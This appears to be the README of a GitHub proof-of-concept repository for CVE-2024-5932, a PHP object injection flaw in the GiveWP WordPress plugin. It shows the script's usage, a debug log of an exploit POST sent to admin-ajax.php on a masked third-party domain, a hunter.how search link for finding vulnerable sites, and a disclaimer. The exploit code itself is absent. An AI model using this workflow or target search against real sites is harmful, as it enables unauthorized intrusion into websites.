Proof-of-Concept for CVE-2024-5932 GiveWP PHP Object Injection

0xb0mb3r/CVE-2024-5932-PoC

CVE-2024-5932-PoC

Proof-of-Concept for CVE-2024-5932 GiveWP PHP Object Injection

⚠️⚠️Kinda works but doesn't. Need Help⚠️⚠️

Usage

python3 exploit.py

The script prompts for the target domain and the full URL of the page where the donation form is located.

┌──(root💀)-[~/CVE-2024-5932-PoC]
└─# python3 exploit.py
Enter the target domain (e.g., example.com):
Please enter the full donation form URL (e.g., https://example.com/donations/donation-form):

Output

┌──(root💀)-[~/CVE-2024-5932-PoC]
└─# python3 exploit.py
Please enter the domain (e.g., example.com): xxxxxxxx.org
Please enter the full donation form URL (e.g., https://example.com/donations/donation-form): https://xxxxxxxx.org/donations/donation-form/
2024-08-22 15:16:52,154 - DEBUG - Attempting to access: https://xxxxxxxx.org/donations/donation-form/
2024-08-22 15:16:52,156 - DEBUG - Starting new HTTPS connection (1): xxxxxxxx.org:443
2024-08-22 15:16:52,580 - DEBUG - https://xxxxxxxx.org:443 "GET /donations/donation-form/ HTTP/1.1" 200 17518
2024-08-22 15:16:52,709 - DEBUG - Received response with status code: 200
2024-08-22 15:16:52,721 - DEBUG - Searching for donation form in the page HTML...
2024-08-22 15:16:52,722 - DEBUG - Donation form found.
2024-08-22 15:16:52,723 - DEBUG - Payload prepared successfully.
2024-08-22 15:16:52,723 - INFO - Sending exploit to https://xxxxxxxx.org/wp-admin/admin-ajax.php...
2024-08-22 15:16:52,723 - DEBUG - Preparing payload...
2024-08-22 15:16:52,724 - DEBUG - Starting new HTTPS connection (1): xxxxxxxx.org:443
2024-08-22 15:16:54,462 - DEBUG - https://xxxxxxxx.org:443 "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 None
2024-08-22 15:16:54,462 - DEBUG - Exploit response status code: 200
2024-08-22 15:16:54,462 - INFO - Exploit sent successfully!

Hunter Search

https://hunter.how/list?searchValue=web.body%3D%22%2Fwp-content%2Fplugins%2Fgive%22

DISCLAIMER:

This script is provided for educational and research purposes only. The intent of this tool is to help security researchers and penetration testers identify vulnerabilities in systems that they have explicit permission to test. Unauthorized access to computer systems is illegal and unethical.

By using this script, you agree to take full responsibility for any actions performed with it. The author and contributors to this script are not responsible for any damages or legal consequences that may arise from its use. Ensure that you have proper authorization before testing any systems with this tool.

Use this tool responsibly and only on systems for which you have explicit permission to perform security testing.

If you are unsure about the legality of your actions, consult with a legal professional before proceeding.
